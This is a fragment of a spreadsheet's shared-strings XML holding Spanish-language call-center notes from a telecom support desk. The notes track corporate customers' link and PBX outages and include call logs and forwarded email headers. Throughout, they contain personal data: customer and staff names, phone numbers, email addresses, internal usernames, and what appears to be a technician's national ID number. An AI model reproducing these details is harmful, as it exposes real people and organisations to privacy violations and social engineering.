    <t>F4619688</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2239-9709 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001683250</t>
  </si>
  <si>
    <t>ES NECESARIO REALIZAR PRUEVAS DE EQUIPOS CON CLIENTE SE PORCEDE A DEJAR EN ETAP PENDIENTE CLIENTE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 2239-9709 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001764150
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO GONZÁLEZ RODRÍGUEZ AL 2239-9709 NO RESPONDE OPERADORA INDICA QUE NO HAY NADIE PARA ATENDER LA LLAMADA || SE INTENTARA LUEGO **
-ID 2001653612
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO 2239-9709 CONTESTA EL SEÑOR CARLOS DIAZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001790627
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE 2239-9709 NO RESPONDE, SE INTENTARA LUEGO **
-ID 2001720830
**</t>
  </si>
  <si>
    <t>F4619709</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENIO JIMENEZ 55554706 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO**
-ID 2001721623
**</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ENIO JIMENEZ 55554706 ID: 2001735011 / ENVIA A BUZON, SE BUSCA EN TKS ANTERIORES EL NUMERO 55554795, SE LLAMA ID: 2001735523, CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A JOSE.OCHOA VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENIO JIMENEZ 55554706 NO RESPODE || ENVIA A BUZON SE INTENTARA LUEGO **
-ID 2001655276
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENIO JIMENEZ 55554706 ENVIA DIRECTO A VUZON, SE INTENTARA LUEGO
-ID 2001684313 - 2001684437</t>
  </si>
  <si>
    <t>F4619710</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENIO JIMENEZ 55554706 ENVIA DIRECTO A VUZON, SE INTENTARA LUEGO
-ID 2001721623
**</t>
  </si>
  <si>
    <t>F4619745</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE IVON CASTELLANOS 50004426 VALIDA QUE EL E1 YA SE ENCUENTRA ACTIVO, INDICA QUE POR LA MAÑANA EL SERVICIO PRESENTÓ UNA CAIDA POR UN MOMENTO PERO YA RESTABLECIÓ. SE REALIZAN PRUEBAS Y EL SERVICIO ES ESTABLE, CLIENTE AUTORIZA EL CIERRE DEL CASO. ID: 2001647247</t>
  </si>
  <si>
    <t>F4619763</t>
  </si>
  <si>
    <t>NO HAY INFORMACIÓN DE LA RAZÓN DE EL ESTADO DE LA FALLA, POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JHONNSER.ESCOBAR POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HAROL PEREZ AL 30413473 NO RESPONDE ENVIA A BUZON DE VOZ ||
SE INTENTARA LUEGO**
-ID 2001657023
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HAROL PEREZ 30413473 MENCIONA QUE YA OBSERVA EL SERVICIO CORRECTAMENTE
-ID 2001685312</t>
  </si>
  <si>
    <t>F4619766</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 10:15
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; MESA DE AYUDA HONDURAS &lt;MESADEAYUDAHN@ITSINFOCOM.COM&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELECOMHN &lt;TELECOMHN@BANRURAL.COM.HN&gt;; SERVICE DESK HN &lt;SERVICEDESKHN@ITSINFOCOM.COM&gt;
ASUNTO: RE: INTERMITENCIA BANRURAL | STB_AZACUALPA_CLARO | ID1251
*-*-*-*</t>
  </si>
  <si>
    <t>F4619770</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE ANTONY GARCIA QUIEN INDICA QUE EL CAJERO SE ENCUENTRA OPERATIVO
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 11:35
FIN: HOY, 11:44
DURACIÓN: 8:47
ID DE LLAMADA: 2001932485</t>
  </si>
  <si>
    <t>F4619785</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ALVAREZ AL 42122189  SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 2001658907
**</t>
  </si>
  <si>
    <t>F4619787</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO ESPINOZA - 31987888 INDICAN QUE ESTA OCUPADA SU EXTENSION QUE SE LE VUELVA A LLAMAR **
-ID 2001661068
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO ESPINOZA 23293000 - 31987888 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001688628</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO ESPINOZA 23293000 - 31987888  MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA PARA LAS 9:00 HRS
-ID 2001646804 - 2001647156</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO TAGUICO 47687682 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001646389</t>
  </si>
  <si>
    <t>F4619791</t>
  </si>
  <si>
    <t>SE ENVIA CORREOA A CLIENTE PARA VALIDR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:54
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE DF CATACAMAS ID: 888290OH
*-*-*-*</t>
  </si>
  <si>
    <t>F4619801</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR LOPEZ-78515607 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001750737</t>
  </si>
  <si>
    <t>## CLENTE APLICA RESET A PBX Y SERVICIO NO RESTABLECE## SE TOMAN DATOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CESAR LOPEZ-78515607  ## SE TIENE EN LINEA ##
2001655255
COLA:
NOMBRE: A: 0050378515607
NÚMERO: 0050378515607
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 0050378515607
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 28/06/2022 08:45:09</t>
  </si>
  <si>
    <t>F4619812</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RONI GUANDALINI 24119191 EXT 10592 MENCIONA QUE NO LLEGAN AL ANCHO DE BANDA, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001660860</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE SR. RONI WANDALI 24119191 EXT 10592 / 30803719 CONFIRMA QUE EL INCONVENIENTE ES CON TODOS LOS APN NO HAY UNO QUE FUNCIONE CORRECTAMENTE, CON ESTA INFORMACION PROPORCIONADA POR CLIENTE SE CONFIRMA QUE LA SOLUCION 3G/LTE POR EL MOMENTO NO ES COMPATIBLE CON LOS APLICATIVOS DE CLIENTE, INFORMA QUE PRONTO MIGRARAN SUS APLICATIVOS PERO SE NECESITA QUE LOS APN SE PUEDAN HACER COMPATIBLES A SUS APLICATIVOS, ADICIONAL SE TIENE EL PROYECTO DE QUE TODOS LOS SITIOS SE MIGRARAN A FIBRA OPTICA, PERO DE MOMENTO SE NECESITAN REALIZAR PRUEBAS, SE LE SOLICITA DATOS Y REQUISITOS CON LOS QUE FUNCIONA SUS APLICATIVOS COMO MTU, TIEMPO DE RESPUESTA, LATENCIA, INFORMA QUE LOS CONSEGUIRA PARA RELIZAR PRUEBA A LAS 2PM SOLICITA QUE SE LLAME NUEVAMENTE Y RELIZAREMOS PRUEBAS CON EL  ID:910400077 APN DE HUEHUETENANGO.</t>
  </si>
  <si>
    <t>F4619814</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR FIGUEROA 42046160 MENCIONA QUE DESDE HACE 2 HORAS QUE VOLVIERON A CONECTAR EL SERVICIO NO LES HA CAUSADO INCONVENIENTE
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001778580</t>
  </si>
  <si>
    <t>F4619818</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR DIAZ AL 32120149 INDICA QUE AUN SIGUE TENIENDO PROBLEMAS QUE NO LE LLEGAN LOS 20 MEGAS SOLICITA CAMBIO DE ROUTER SE LE INFORMA QUE TENDRA QUE SOLICITARLO CON EL EJECUTIVO INDICA QUE ENTONCES ESTARA HABLANDO CON EL Y SOLICITA SE LE ENVIEN LAS PRUEBAS || SE NOTIFICA A GESTOR **
-ID 2001672235
**</t>
  </si>
  <si>
    <t>F4619822</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRUZ SANCHEZ 8238-6140 SE CONACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 2001676723
**</t>
  </si>
  <si>
    <t>F4619826</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRUZ SANCHEZ 8238-6140 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001763281
**</t>
  </si>
  <si>
    <t>F4619830</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LISANDRO QUESADA AL 2236-0100 EXT. 3 NO RESPONDE,  ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 2001680213
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LISANDRO QUESADA AL 2236-0100 EXT. 3 NO RESPONDE,  ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 2001689589
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LISANDRO QUESADA AL 2236-0100 EXT. 3 NO RESPONDE,  ENVIA A BUZON ||
SE INTENTARA LUEGO **
-ID 2001722681
**</t>
  </si>
  <si>
    <t>F4619843</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BERNARDO UGALBE 41154669 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001669022</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BERNARDO UGALBE 41154669 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 2001664986</t>
  </si>
  <si>
    <t>F4619862</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN HERRERA 89904025 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO COMENTA QUE EL TICKET EL LO HABIA ABIERTO POR LA AGENCIA DE TEGUCIGALPA Y ESTA SOLICITANDO CAMBIO DE EQUIPO YA QUE ES EL EQUIPO EL DEL PROBLEMA INDICA SE LE INFORMA QUE TIENE QUE ABRIR TICKET Y EL CAMBIO DE EQUIPO LO TIENE QUE SOLICITAR AL EJECUTIVO.
-ID 2001680862 - 2001681385
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDWIN HERRERA 89904025 PERO NO REPONDE, SE INTENTARA LUEGO
-ID 2001656157</t>
  </si>
  <si>
    <t>F4619875</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE, DONDE INDICA QUE SE TIENE FALLA DE ENERGIA ELECTRICA.</t>
  </si>
  <si>
    <t>F4619889</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ES FALLA DE ENERGIA EN PUNTO REMOTO.
BUENA TARDE CON LA SIGUIENTE SUCURSAL TENDRÁN INFORMACIÓN CC_AZTECA_GT_SUC004553/265900370T?
SERGIO, 15:59
BUENA TARDE, CORTE PROGRAMADO POR EL INDE</t>
  </si>
  <si>
    <t>F4619895</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISRAEL VELASQUEZ 33903496 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO BIEN PERO SE VALIDA CON GESTOR QUE EL SERVICIO SE ESTA SATURANDO
CLIENTE SOLICITA SE COMPARTA POR CORREO LAS PRUEBAS Y LAS IP CON MAYOR CONSUMO
JVELASQUEZ@IPP.GOB.GT
-ID 2001676532</t>
  </si>
  <si>
    <t>F4619897</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROMAIN RIVERA 9666-7507 NO SE LOGRA COMUNICACION IVR ENVIA A BUZON, 2001779513
COLA:
NOMBRE: TO: 0050496667507
NÚMERO: 0050496667507
DURACIÓN: 0:00:46
ESTADO: MARCANDO
DETALLES: 0050496667507
PROCESO ASOCIADO:
IC SERVER: CEN-GT-CIC-02
IC USER: MIGUELRODRIGUEZ
LOCAL DATE/TIME: 6/28/2022 2:50:55 PM
ENLACE CONTINUA OPERATIVO:
&lt;NSRCHNSON1D1EIM1&gt;PING -VPN-INSTANCE RNP 10.2.35.50
  PING 10.2.35.50: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.2.35.50: BYTES=56 SEQUENCE=1 TTL=255 TIME=16 MS
    REPLY FROM 10.2.35.50: BYTES=56 SEQUENCE=2 TTL=255 TIME=12 MS
    REPLY FROM 10.2.35.50: BYTES=56 SEQUENCE=3 TTL=255 TIME=11 MS
    REPLY FROM 10.2.35.50: BYTES=56 SEQUENCE=4 TTL=255 TIME=11 MS
    REPLY FROM 10.2.35.50: BYTES=56 SEQUENCE=5 TTL=255 TIME=21 MS
  --- 10.2.35.50 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 11/14/21 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROMAIN RIVERA 9666-7507 NO CONTESTO IVR ENVIA A BUZON, ID: 2001675805.</t>
  </si>
  <si>
    <t>F4619899</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JAIRO QUIEN INDICA QUE EL PROBLEMA DE LAS LLAMADAS YA FUE SOLVENTADO.
3001403400
COLA:
NOMBRE: A: 0050378551587
NÚMERO: 0050378551587
DURACIÓN: 0:06:13
ESTADO: CONECTADA
DETALLES: 0050378551587
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 16:04:00</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JAIRO QUIEN INDICA QUE YA NO ESTA EN LAS INSTALACIONES PERO VA A LLAMAR AL PERSONAL PARA QUE REALICE PRUEBAS.
3001021938, 3001025417
COLA:
NOMBRE: A: 0050378551587
NÚMERO: 0050378551587
DURACIÓN: 0:00:19
ESTADO: MARCANDO
DETALLES: 0050378551587
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 29/06/2022 16:47:37</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE JAIRO GOMEZ 22121050 INDICA QUE EL PROBLEMA SE DÁ UNICAMENTE EN LLAMADAS SALIENTES. CLIENTE TIENE ALGUNOS NÚMEROS CONFIGURADOS CON AVI PARA QUE NO PIDAN CÓDIGO AL MOMENTO DE SACAR LLAMADAS, CUANDO LLAMA DESDE ÉSTOS NÚMEROS NO PRESENTA NINGÚN INCONVENIENTE. PERO CUANDO LLAMA DESDE NÚMERO SIN AVI ES CUANDO SE PRESENTA EL PROBLEMA.</t>
  </si>
  <si>
    <t>F4619903</t>
  </si>
  <si>
    <t>NOHEMI-57154895 SE TIENE ENE LINEA
2001684135
COLA:
NOMBRE: A: 57154895
NÚMERO: 57154895
DURACIÓN: 0:01:02
ESTADO: CONECTADA
DETALLES: 57154895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 28/06/2022 10:06:44</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOHEMI-57154895 QUIEN CONFIRMA EL FUNCIONAMIENTO CON EL SERVICIO
-ID 2001704976</t>
  </si>
  <si>
    <t>F4619904</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA ANIBAL GONZALEZ PARA AVANCES, SE VERIFICA F4619904 E INDICA QUE SE TIENE REPORTE DE INCONVENIENTES DE ENERGÍA COMERCIAL CON INTERMITENCIA, CL INDICA QUE SE ACABA DE COMUNICAR CON EL GERENTE Y HOY NO PRESENTAN NINGÚN INCONVENIENTE DE ENERGÍA, SOLICITA QUE SE REALICE EL SEGUIMIENTO CORRESPONDIENTE*/*/*/
CONTACTO DEL PR:
TERESO COLAJ 57666343</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 28 DE JUNIO DE 2022 12:36
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | "CC_BANRURAL_GT_AGENCIA_0383" |BANCO DE DESARROLLO RURAL, S.A. |CALLE PRINCIPAL ALDEA LAS ESCOBAS SAN MARTIN JILOTEPEQUE CHIMALTENANGO
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO "CC_BANRURAL_GT_AGENCIA_0383"  |BANCO DE DESARROLLO RURAL, S.A. |CALLE PRINCIPAL ALDEA LAS ESCOBAS SAN MARTIN JILOTEPEQUE CHIMALTENANGO
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICO:
FLAVIO ROMEO ESQUIT AJQUEJAY 2489694550409
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4619921</t>
  </si>
  <si>
    <t>SE PLATICA CON EL TEC. LUIS GEOVANY DEL CID CAJAS  DONDE NOS INFORMA QUE YA SE DIRIGE HACIA EL NODO A REVISAR QUE EN UN LAPSO DE 45 MINUTOS SE ENCUENTRA EN EL NODO
2001712081
COLA:
NOMBRE: A: 58260676
NÚMERO: 58260676
DURACIÓN: 0:02:02
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58260676
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 28/06/2022 11:21:05</t>
  </si>
  <si>
    <t>F4619926</t>
  </si>
  <si>
    <t>INFORMA CLIENTE ROSA MARÍA BARRIOS 23399085 QUE LOS DOS E1 REPORTADOS YA ESTÁN RESTABLECIDOS, INDICA QUE REINICIARON SU PLANTA PBX, HABÍA QUEDADO INHIBIDA POR APAGÓN QUE SUFRIERON EL DÍA DE AYER. SE LLAMA A LOS GDN 22086000 Y 22090909 Y YA COMPLETAN LAS LLAMADAS. CLIENTE AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001674465</t>
  </si>
  <si>
    <t>F4619927</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE EDUARDO LOPEZ QUIEN INDICA QUE YA POSEE LLAMADAS SALIENTES.
AUTORIZA EL CIERRE.</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE AL CLIENTE EDUARDO LOPEZ PERO NO CONTESTA.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EDUARDO LOPEZ 87620111, PERO NO CONTESTA.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>F4619928</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE GLADIS JUAREZ 42261988,  ID DE LLAMADA: 3001434528, QUIEN INDICA QUE NO SE ENCUENTRA EN SITIO Y QUE SE  LE CONTACTE EL DIA LUNES 04/07 EN HORARIO HABIL PARA DESCARTAR ENERGIA.</t>
  </si>
  <si>
    <t>F4619930</t>
  </si>
  <si>
    <t>SE LLAMO AL OTRO NUMERO AL CLIENTE MARIA JAVIER  63100528 PERO NO CONTESTA.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIA JAVIER PERO ENVIA A BUZON.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIA JAVIER 74787774, QUIEN INDICA QUE VA A REINICIAR LA PBX.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE VALIDA EL SERVICIO CON EL CLIENTE GEOVANNI.
2001770875
COLA:
NOMBRE: A: 0050323222000
NÚMERO: 0050323222000
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 0050323222000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 28/06/2022 14:18:45</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIA JAVIER, PERO NO CONTESTA.74787774.
SE LLAMO AL OTRO NUMERO 63100528, TAMPOCO CONTESTA.</t>
  </si>
  <si>
    <t>F4619934</t>
  </si>
  <si>
    <t>F4619948</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE XINIA AYALA AL 22109500 CONTESTA EL SEÑOR SANTIAGO BONILLA E INDICA QUE PARA VALIDAR TIENE QUE SER POR MEDIO DE CORREO A LA MESA DE SERVICIO || SE NOTIFICA A GESTOR **
-ID 2001695749
**</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A CLIENTE A ESPERA DE RESPUESTA**
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 9:14
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
CC: JESSICA FELICITA MARROQUIN FERRERA &lt;JFMARROQ@BANCOAGRICOLA.COM.SV&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; OSCAR ARMANDO CAMINOS CHAVEZ &lt;OCAMINOS@BANCOAGRICOLA.COM.SV&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; GERARDO BENJAMIN TOBAR HERNANDEZ &lt;GBTOBAR@BANCOAGRICOLA.COM.SV&gt;; GESTION INCIDENTES TI BANCO AGRICOLA &lt;GEINTIBA@BANCOAGRICOLA.COM.SV&gt;; JOSE MANUEL GRANDE VIDES &lt;JMGRANDE@BANCOAGRICOLA.COM.SV&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; ATMS &lt;ATMS@BANCOLOMBIA.COM.CO&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET#20499792 ¿ CAÍDA ENLACE CAJA_EXPRESA_ESCALON_NORTE-CL-IP2030033</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 10:45
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
CC: JESSICA FELICITA MARROQUIN FERRERA &lt;JFMARROQ@BANCOAGRICOLA.COM.SV&gt;; MONITOREOCOBA &lt;MONITOREOCOBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; OSCAR ARMANDO CAMINOS CHAVEZ &lt;OCAMINOS@BANCOAGRICOLA.COM.SV&gt;; SOPORTEL2COBA &lt;SOPORTEL2COBA@BANCOLOMBIA.ONMICROSOFT.COM&gt;; GERARDO BENJAMIN TOBAR HERNANDEZ &lt;GBTOBAR@BANCOAGRICOLA.COM.SV&gt;; GESTION INCIDENTES TI BANCO AGRICOLA &lt;GEINTIBA@BANCOAGRICOLA.COM.SV&gt;; JOSE MANUEL GRANDE VIDES &lt;JMGRANDE@BANCOAGRICOLA.COM.SV&gt;; ENLACES &lt;ENLACES@BANCOAGRICOLA.COM.SV&gt;; ATMS &lt;ATMS@BANCOLOMBIA.COM.CO&gt;; REDES Y SEGURIDAD &lt;RED-VSTS@BANCOLOMBIA.ONMICROSOFT.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TICKET#20499792 ¿ CAÍDA ENLACE CAJA_EXPRESA_ESCALON_NORTE-CL-IP2030033
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, A NIVEL DE CLARO NO SE APLICÓ NINGUNA ACCIÓN CORRECTIVA.
SE VALIDA QUE EL EQUIPO PRESENTA UN REINICIO
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*--*-*-*</t>
  </si>
  <si>
    <t>F4619950</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE MAURICIO.
CLIENTE INDICA QUE REINCIO LA PBX Y YA POSEE SERVICIO.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>F4619952</t>
  </si>
  <si>
    <t>SE LLAMA A DANY ORDOÑEZ QUIEN INDICA QUE HACE DOS DIAS LLEGO PERSONAL CLARO PARA CAMBIAR EQUIPOS, INDICA QUE NO TIENE NINGUN INCONVENIENTE Y QUE HAN ESTADO CON ACTIVIDADES NORMALES || SE VALIDA QUE SE TIENE PROYECTO 5459107 PERO NO SE TIENE MAYOR DETALLE
3001166056
COLA:
NOMBRE: A: 55233442
NÚMERO: 011 50255233442
DURACIÓN: 0:05:02
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50255233442
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 30/06/2022 13:49:47</t>
  </si>
  <si>
    <t>F4619969</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24207210 WALTER MENCIONA QUE SI REALIZARON LAS PRUEBAS DE PRIMER NIVEL
-ID 2001701095</t>
  </si>
  <si>
    <t>F4619972</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 44990369 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001686477
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001709644</t>
  </si>
